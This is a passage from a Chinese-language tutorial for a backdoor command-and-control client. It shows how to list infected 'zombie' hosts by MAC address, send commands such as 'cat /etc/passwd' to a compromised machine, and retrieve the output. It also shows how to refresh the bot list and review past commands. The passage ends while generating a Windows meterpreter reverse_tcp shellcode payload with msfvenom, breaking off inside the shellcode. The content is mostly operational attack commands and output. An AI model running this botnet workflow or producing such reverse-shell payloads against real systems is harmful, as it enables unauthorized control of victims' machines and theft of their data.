help - print this usage

exit - exit the client

$

·一旦你在一些系统上安装了后门，你就可以使用列表命令检查可用的客户端：

$ list_bots

B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise

$

输出信息中用于标识肉鸡的唯一ID的是系统的MAC地址，同时也为你提供了正在运行已植入木马的操作系统信息。如图是一个Linux主机。

·这里我们发出一个命令到已植入木马的主机：

$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd

[+] Sent command "cat /etc/passwd" with jobid: UMW07r2

$

这里我们想让B7:76:1F:0B:50:B7 这台主机执行cat /etc/passwd 命令，输出信息中的jobid可以让用来检索命令输出结果。

·现在我们要获取命令执行结果了!

$ !retrieve UMW07r2

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

(...）

在这种情况下使用!retrieve [jobid]命令就可以获取到命令执行结果。

·更新结果

为了获取新的肉鸡或命令输出信息，或者想强制客户端刷新命令执行结果，可以使用refresh命令。

$ refresh

[+] Sending command to retrieve alive bots

[+] Sleeping 10 secs to wait for bots

$

使用refresh命令将会发送一个PING请求，等待回复(大约10秒左右)。私信消息被解析后，肉鸡列表和命令列表将会刷新，其中也包括输出命令。

·检索过去的命令

正如前面所说，(之前的)命令将会从老的私信消息进行检索(最多是200条)，通过使用list_commands命令你便可以检索或者看到这些内容。

$ list_commands

8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1

VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1

9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1

aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1

8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1

$

·运行shellcode(Windows主机)

此选项可能是为了方便检索meterpreter会话，如果有兴趣可以看一下这篇文章，很有帮助。

创建你的meterpreter Shellcode，就像下面这样：

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python(...)Payload size: 299 bytes

buf = ""

buf += "üè‚